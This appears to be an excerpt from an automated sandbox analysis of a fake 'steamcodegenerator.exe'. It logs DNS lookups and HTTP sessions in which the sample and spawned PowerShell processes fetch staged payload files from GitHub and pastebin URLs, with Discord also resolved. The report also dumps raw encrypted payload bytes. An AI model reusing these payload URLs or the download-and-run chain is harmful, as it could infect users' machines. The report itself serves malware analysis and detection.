                                                                      Oct 15, 2024 15:59:27.501832962 CEST1.1.1.1192.168.2.40xc429No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:32.546056032 CEST1.1.1.1192.168.2.40x9092No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:32.546056032 CEST1.1.1.1192.168.2.40x9092No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:32.546056032 CEST1.1.1.1192.168.2.40x9092No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:32.546056032 CEST1.1.1.1192.168.2.40x9092No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:51.581504107 CEST1.1.1.1192.168.2.40x30d8No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:51.581504107 CEST1.1.1.1192.168.2.40x30d8No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:51.581504107 CEST1.1.1.1192.168.2.40x30d8No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.461483955 CEST1.1.1.1192.168.2.40xd6aNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.461483955 CEST1.1.1.1192.168.2.40xd6aNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.461483955 CEST1.1.1.1192.168.2.40xd6aNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.461483955 CEST1.1.1.1192.168.2.40xd6aNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.461483955 CEST1.1.1.1192.168.2.40xd6aNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                      • github.com
                                                                      • objects.githubusercontent.com
                                                                      • raw.githubusercontent.com
                                                                      • pastebin.com
                                                                      • discord.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449737185.199.109.133807744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 15:59:32.567075014 CEST223OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 15:59:33.161463976 CEST542INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Length: 0
                                                                      Server: Varnish
                                                                      Retry-After: 0
                                                                      Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:33 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210063-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000773.096975,VS0,VE0
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Expires: Tue, 15 Oct 2024 14:04:33 GMT
                                                                      Vary: Authorization,Accept-Encoding


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449740172.67.19.24805660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 15:59:51.594091892 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 15:59:52.218569040 CEST472INHTTP/1.1 301 Moved Permanently
                                                                      Date: Tue, 15 Oct 2024 13:59:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 167
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Tue, 15 Oct 2024 14:59:52 GMT
                                                                      Location: https://pastebin.com/raw/sA04Mwk2
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d305506dedb2cbb-DFW
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449743185.199.109.133805660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 15:59:53.106467962 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 15:59:53.728348970 CEST541INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Length: 0
                                                                      Server: Varnish
                                                                      Retry-After: 0
                                                                      Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:53 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdal2120056-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000794.666717,VS0,VE0
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Expires: Tue, 15 Oct 2024 14:04:53 GMT
                                                                      Vary: Authorization,Accept-Encoding


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449745172.67.19.24807248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 15:59:59.908361912 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 16:00:00.529232025 CEST472INHTTP/1.1 301 Moved Permanently
                                                                      Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 167
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Tue, 15 Oct 2024 15:00:00 GMT
                                                                      Location: https://pastebin.com/raw/sA04Mwk2
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30553ade9b4763-DFW
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449747185.199.109.133807248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 16:00:01.348216057 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 16:00:02.198314905 CEST541INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Length: 0
                                                                      Server: Varnish
                                                                      Retry-After: 0
                                                                      Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdal2120039-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000802.891102,VS0,VE0
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                                      Vary: Authorization,Accept-Encoding


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449735140.82.121.34437500C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:27 UTC124OUTGET /user-attachments/files/17267811/stm.txt HTTP/1.1
                                                                      User-Agent: Downloader
                                                                      Host: github.com
                                                                      Cache-Control: no-cache
                                                                      2024-10-15 13:59:27 UTC940INHTTP/1.1 302 Found
                                                                      Server: GitHub.com
                                                                      Date: Tue, 15 Oct 2024 13:59:27 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                      Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain
                                                                      Cache-Control: no-cache
                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                      X-Frame-Options: deny
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                      2024-10-15 13:59:27 UTC4052INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449736185.199.109.1334437500C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 13:59:28 UTC549OUTGET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1
                                                                      User-Agent: Downloader
                                                                      Cache-Control: no-cache
                                                                      Host: objects.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:28 UTC654INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 39510
                                                                      x-amz-id-2: 2yQ2hjkaXDvxiRk3rcYUbcQmpz6nFMYhmpjklQvgJQUZ7HPF7GoL4dKnLWTH17X0VLM2Ls+FV8IYEsqOEeoynn+pEgQuH/LQmd2pAS+mRBE=
                                                                      x-amz-request-id: QHWNM55YC6JSNR9P
                                                                      Last-Modified: Sun, 06 Oct 2024 01:36:28 GMT
                                                                      ETag: "ebe145bd87e74b4bca45e87525372f04"
                                                                      x-amz-server-side-encryption: AES256
                                                                      Content-Disposition: attachment;filename=stm.txt
                                                                      Content-Type: text/plain
                                                                      Server: AmazonS3
                                                                      Fastly-Restarts: 1
                                                                      Accept-Ranges: bytes
                                                                      Age: 432
                                                                      Date: Tue, 15 Oct 2024 13:59:28 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210095-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000768.176668,VS0,VE0
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: e8 c0 65 00 00 c0 65 00 00 30 67 fb 70 e1 b3 31 b0 2e b5 c0 c2 3e c6 7f 45 9e 24 2a b5 b3 fc 69 87 b4 31 b9 cf fd a7 fc 9b 00 00 00 00 59 44 28 d3 e2 80 68 27 40 df f0 62 05 d0 2d 15 53 21 d4 23 68 7a fa 8d 54 32 e8 58 21 3b 59 73 db 4e a8 6d 30 64 79 44 3b 64 39 ac 78 ac b7 08 b3 ff 58 b7 ae 65 c1 1b 53 f6 f7 5f dd f5 44 26 67 2a 27 5a 47 11 fe 7a 9e 07 29 6f 83 4d b7 28 43 da ee 40 b8 03 9a 38 06 be 48 31 95 be c3 d4 88 c3 8c e6 83 eb d1 53 78 5b 0b 5e 55 04 46 cc 4e 65 38 3b 49 43 10 03 ca e1 a2 2d df d0 bc 35 4f 75 61 fc 05 c6 7c 8a 1d 78 37 54 d1 a2 6d 3f 48 2f 7e e9 c2 7e c6 a3 c5 0b 39 5e d5 b0 85 10 e5 b5 ea 0b 98 71 df 75 26 f9 c0 1f c7 0c 55 25 3d 37 1e ca 5d e1 d3 4a cf bc 71 91 49 70 dc 26 7b b0 34 8d b3 5b ec 0f a5 16 dc b1 f5 bd 60 e3 de 65
                                                                      Data Ascii: ee0gp1.>E$*i1YD(h'@b-S!#hzT2X!;YsNm0dyD;d9xXeS_D&g*'ZGz)oM(C@8H1Sx[^UFNe8;IC-5Oua|x7Tm?H/~~9^qu&U%=7]JqIp&{4[`e
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 60 3f 3a 33 42 27 66 1c 25 78 e9 6b 72 b1 87 8e a6 23 a3 99 44 fe 86 2c 3f 6a ab 95 b6 36 cb d6 05 89 ee e6 b7 21 c3 f8 da 6a 53 e8 d2 45 86 51 73 a4 a0 78 17 ce 14 9e 7f 05 d4 2e dc 14 bf 4b 26 66 21 2e 10 08 81 ef 86 96 55 fb bb db e9 db 3a c4 77 74 5e 71 bb 43 b7 67 5e 12 2f 00 69 29 31 df c3 51 9d 93 c4 e0 10 4d b5 91 8d 3d e3 c1 38 63 03 0b 3b dc 50 8a f4 f7 7b 8c 3b 94 83 9c fb f3 fb e7 1a 29 f0 3b 23 c4 76 fe 6e 48 2a 55 73 64 1b 63 c7 0f e1 d8 1d 6a a5 9c 6c 27 cd bb 88 2d b1 aa c0 41 8e 1b eb e5 4f ca b7 08 d5 53 0f b2 38 09 26 4e d1 b0 1f 0a a0 32 76 c4 ab 9a cc fb 5b 10 00 05 13 fb 74 61 8c e9 f0 be 5e 92 75 a1 bb 95 41 23 67 fe 3b c2 29 05 9d 9f 46 f9 f2 c1 99 c0 a4 54 1a 34 8d aa b8 db 31 14 57 92 cf d9 55 ab da 66 f8 fc a2 6c 2f 08 3a 6b d5
                                                                      Data Ascii: `?:3B'f%xkr#D,?j6!jSEQsx.K&f!.U:wt^qCg^/i)1QM=8c;P{;);#vnH*Usdcjl'-AOS8&N2v[ta^uA#g;)FT41WUfl/:k
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 51 36 53 e6 ca 9d b9 7b 3d a3 3c 6f 0f ac e9 73 bf e1 45 30 cf 78 83 01 ba e5 1d d8 b6 12 48 a2 41 5f 72 23 6b dd a6 f6 3a a0 48 f7 24 94 44 8e 62 1e 7a eb ee 28 a0 47 5e 5d bd de 6f 3d 7a db 7e 4f 7b da 2b 47 81 ed 36 77 59 61 c4 b3 30 3c 3c 50 a1 c5 73 ba 16 32 15 56 bd cf a1 57 8d c5 ea 86 6d 14 d9 f7 3e a5 f9 68 2c f6 09 6d 5e f7 b2 e2 7a cc 02 50 51 f9 a0 db 52 06 dd 0d a0 7d 82 92 e7 f6 1b 25 21 0d 91 eb e4 4e fe 09 c6 ef 5e 0d 29 e0 9f f8 7a b4 d8 79 d8 74 75 d2 e8 38 65 0b 4f 22 58 2f c5 5d a7 23 35 52 89 76 ff e4 d0 d1 62 fc 29 41 2b 47 a1 33 2b 14 26 97 63 7a 5a 37 dc 18 f6 1b a4 8a 05 0f ab fb 51 ac b7 36 83 f1 da e9 57 d1 95 78 ca 20 a8 e1 75 61 67 17 3f e3 00 8d 05 5f 58 aa 0d bd c7 13 e4 8e 96 29 e7 ac c7 48 66 30 b3 de 6f 2e 98 67 65 48 d1
                                                                      Data Ascii: Q6S{=<osE0xHA_r#k:H$Dbz(G^]o=z~O{+G6wYa0<<Ps2VWm>h,m^zPQR}%!N^)zytu8eO"X/]#5Rvb)A+G3+&czZ7Q6Wx uag?_X)Hf0o.geH
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 72 c8 89 86 8a ec 93 d4 5b 5b 14 b2 7c ba 8c 56 98 64 eb 7b ea 6e 8d bc e6 6d 7a 53 b4 b7 ce 60 28 87 94 8f c4 55 5b 51 e7 d3 27 14 d4 47 c3 6b cd 49 37 ef 06 21 b7 a3 0b ea 94 d6 81 e8 7a b2 ae ff 36 6c 73 d2 f2 db 78 d1 d1 3a 0a 77 93 59 4b 6f fd 8c e4 51 69 9c 17 bc 5a 6b b1 0a a9 38 d7 c6 33 d2 d1 66 22 05 7a 3d 28 d0 c0 5e 5d cc 50 3d 8d a5 6a 55 8e 9b 9c 94 9c 5e 4e 3c 43 80 07 f5 4a 1a 11 b6 c1 ac b0 e2 3e 7d 83 61 18 bd b7 79 77 8c 40 78 48 b9 d7 47 61 f4 02 03 7c 48 c3 d0 d3 d0 0a 18 8d e7 17 09 7a 36 50 25 3b 20 e1 45 bd 30 15 d4 0b 58 fc 31 67 ff 5e bc dc 7f 47 60 0a 24 40 d6 4c 5d c7 1c 8e 4f 9c 60 4c a3 3f 52 c6 5d b1 e5 ef a3 f5 06 27 86 f9 dc 10 cb 12 9a 77 2d 2d 06 db 15 30 46 9f db 14 b9 3b 7b 3a 02 7e 04 51 79 c2 d3 41 07 53 2f d1 38 34
                                                                      Data Ascii: r[[|Vd{nmzS`(U[Q'GkI7!z6lsx:wYKoQiZk83f"z=(^]P=jU^N<CJ>}ayw@xHGa|Hz6P%; E0X1g^G`$@L]O`L?R]'w--0F;{:~QyAS/84
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: bd 5f 2c ec 9a 58 4d 1f 05 1b 47 94 32 a5 2c 4e fc e2 3c 4a 8d cc f9 63 63 d3 80 64 5e 0f a1 aa f8 ab 1c b2 53 02 11 a3 60 9a ba 3f 7f 53 2f 18 de 69 0d f5 f4 04 2c 9f 55 03 67 1a a1 b4 a1 2a 12 a8 29 c5 e0 50 ac de bb 0e f3 a6 cb 06 a2 bf 31 bb 24 2e 72 6f 4f 35 05 07 e7 b5 ec 6f 7f be 0c 80 26 80 3f db 41 0d 4e 64 6e 8f e8 bd fc 99 a7 28 b9 8c e9 8e ac 22 8e ee 5c 23 28 af 1d 7a 58 25 fb f3 70 99 cb 45 4e cf 56 3b 16 5b 86 cc be 5d 44 57 2c 6b 78 78 6b 07 1a 05 18 9c 6f 63 4f 53 26 5d 12 bc b3 41 ac 74 fb e3 a5 00 94 eb ef 70 ed 76 d8 9a 07 af d1 c1 28 1e 81 42 0b 90 7c 05 ec 3f b0 0d d9 66 53 16 df dd 22 0a 15 0f 37 57 63 f6 a1 38 56 c6 79 84 d0 59 09 7d 96 48 66 05 b0 f6 13 f6 68 da 19 63 70 68 79 a9 30 c0 a8 b0 8e 8a 57 c2 ae a0 86 c3 39 53 60 34 de
                                                                      Data Ascii: _,XMG2,N<Jccd^S`?S/i,Ug*)P1$.roO5o&?ANdn("\#(zX%pENV;[]DW,kxxkocOS&]Atpv(B|?fS"7Wc8VyY}Hfhcphy0W9S`4
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 15 c7 3a af 21 d7 01 99 91 92 8b ff ca dd 8b 42 c3 61 4e 62 52 3f e1 8b c7 b4 6d 43 a0 b6 44 e7 0a 25 51 01 49 ae 78 a3 b1 09 ae b9 39 71 cd f1 44 99 95 fd 76 b0 57 56 fc 10 01 18 c9 fe 77 06 38 d7 2e 07 82 19 ff 0e c3 d8 24 14 14 48 2d 21 7a cb 62 1e 2e 8b 66 92 bf dd cd 05 0c f8 ef 4f 1c 2e 2d bc 2f 45 0d 40 c2 2c db 8e 5a de c8 64 af cc cd 65 b0 e6 60 9f a5 d6 57 f3 30 88 be a0 e4 36 d6 1a e1 0a b3 cf 9f 6e 20 56 a7 cd c9 a7 49 96 b3 b2 59 ad 89 0b e2 88 94 a2 20 f5 79 ab 91 b3 cb e1 d3 88 60 54 eb 07 cf 15 3d 22 5d 38 27 3e 21 ac 15 a9 de aa 93 db 13 66 ed 54 c3 4c 01 31 6d ea 13 a2 e4 29 9b 3e db 98 c1 1c 12 0a 9f fc 97 77 3b 65 0d 3e fa 3e e6 ea e7 de 31 68 82 be 76 ee 01 e2 03 fd 9c 3f dd 2f 9f e8 f0 cd 20 b7 1b 82 ea 89 f5 d6 28 c2 77 ed 7b ad b0
                                                                      Data Ascii: :!BaNbR?mCD%QIx9qDvWVw8.$H-!zb.fO.-/E@,Zde`W06n VIY y`T="]8'>!fTL1m)>w;e>>1hv?/ (w{
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: c0 4c 38 b7 2d 54 80 8f ad 07 ce 6c d7 6d 37 90 d0 2a 77 ab e0 c9 10 9e 68 6e ae 90 f1 6d d4 3a e3 2b 21 9c 6c 18 55 55 38 b8 13 eb 2e fd 17 e4 89 8e c3 93 61 19 cf 2e 1a 40 26 fa 95 f1 92 67 66 c7 94 9a 50 1f dc e9 68 1f d1 c9 54 78 32 53 48 b8 f0 da 9a b9 09 0c 0a 7f 51 71 5b 03 f1 e3 9c a0 28 96 58 00 b5 04 fb c4 cf db 3d aa 55 77 6d b8 b2 39 e0 61 b4 f2 e7 23 6d b1 a8 39 e0 92 3f 7f 2e 00 fc a0 34 46 80 d4 c5 0e 6a fe 5d 24 b2 5b 01 77 65 2d 59 bf 8b fe c3 e3 8e 45 5f da fa 65 98 0e 53 e8 32 d4 bd e8 5d 35 8a d0 ab 07 31 8d c8 3d 48 17 7a 53 d5 c4 4a a0 36 65 32 9b 8e 49 e2 c2 6f 21 65 dd 8d d3 1f 99 7f ef bc ff c1 8f 70 f2 08 bd f8 4e e7 72 48 a7 4f 86 b4 e1 37 d6 45 3a 26 84 da bc 21 b7 63 e7 38 56 65 f6 35 14 31 91 96 58 6c 5d 3d 6e 19 36 19 37 8c
                                                                      Data Ascii: L8-Tlm7*whnm:+!lUU8.a.@&gfPhTx2SHQq[(X=Uwm9a#m9?.4Fj]$[we-YE_eS2]51=HzSJ6e2Io!epNrHO7E:&!c8Ve51Xl]=n67
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: fd 2e 14 48 4e 91 85 d6 25 b1 8b 6c ff ae a7 19 bf 8f 24 f3 7c 6f 87 56 ef 14 22 67 64 d9 c1 69 3d 66 4c bb 88 30 68 60 61 d9 c5 97 d4 0f cd f2 81 05 32 75 00 0d ae 83 4c b4 71 33 6a 26 b3 ff 00 6e 17 c3 f9 e6 5c f5 55 a1 3a 79 e6 8f 27 98 61 31 ef 53 62 7d a1 3c b7 8b f5 d3 f2 c4 2a d9 f1 31 30 62 08 94 1c 69 db 21 91 51 68 8d 0f 45 32 91 aa bc 8d 2b 22 1c 4b fd 81 ab ef c4 bc 69 5b d2 8f c2 56 08 e2 ad 96 db 16 dd ab a1 99 1f c5 01 fb 67 f7 06 f5 67 2a 50 f1 0a 08 19 69 ac a3 b0 36 9e ff 7b e1 23 9e b9 52 a2 d4 66 95 9b 9d e3 3d a4 ce 9b f6 3f 31 8e 04 87 b3 78 bf e3 06 ac 87 2b d8 93 17 d4 86 dd 0e 4d 7e a3 c3 fe 8e 55 c5 48 74 0e c0 ef 64 40 06 e3 42 e4 ab 55 3d 90 08 5e 05 ca ae 2b 7f d2 75 67 62 a7 ee 07 5c ab be 6e c8 4e be 18 8e a0 05 b0 26 22 ab
                                                                      Data Ascii: .HN%l$|oV"gdi=fL0h`a2uLq3j&n\U:y'a1Sb}<*10bi!QhE2+"Ki[Vgg*Pi6{#Rf=?1x+M~UHtd@BU=^+ugb\nN&"
                                                                      2024-10-15 13:59:28 UTC1378INData Raw: 7a ee 7b ce 51 f5 c0 f7 20 80 38 29 33 ea 43 4e d2 2c 47 f9 4c d8 bb 7d 76 2d 47 27 ac e1 b5 fb df 59 5d cd b2 6a c1 fd 17 d0 0e b2 81 95 18 a0 76 dd de c4 7e 5c e7 49 db 31 02 a7 3d 0c ca 91 0e b2 78 da 4c fc 0d 0f 6d b2 4b 83 57 b1 8b 4e 03 bd bb 44 67 06 b4 82 09 79 5b f5 ab 76 51 fc 45 3c 56 14 cc a7 14 97 fb ea 2d 95 ab 9b eb d6 92 a3 37 02 7f c7 71 2f e5 ea ee f2 49 87 63 41 93 51 9e ca e1 6d b6 c4 a9 f8 e1 70 7d 31 ac 3c cc 61 a2 9a 66 29 ce f5 9e 38 7d 0b 2f e5 48 be ce 96 a7 e3 51 9a 42 4b db 79 e5 d1 f7 98 15 99 7b 47 31 92 0b 24 ea 77 d7 0a cd 05 f8 03 37 71 38 c2 d0 65 81 1d 11 49 81 25 6c 53 99 5a f7 77 bc 7e 5a f1 e6 e6 ac 13 65 c9 01 cf b8 71 c3 85 3d 35 ab ab 0c e0 b6 3f e1 51 1f b8 67 66 8e 7c bc b3 cc 6f 4d 7d 78 4a 71 f4 06 7f 36 54 45
                                                                      Data Ascii: z{Q 8)3CN,GL}v-G'Y]jv~\I1=xLmKWNDgy[vQE<V-7q/IcAQmp}1<af)8}/HQBKy{G1$w7q8eI%lSZw~Zeq=5?Qgf|oM}xJq6TE
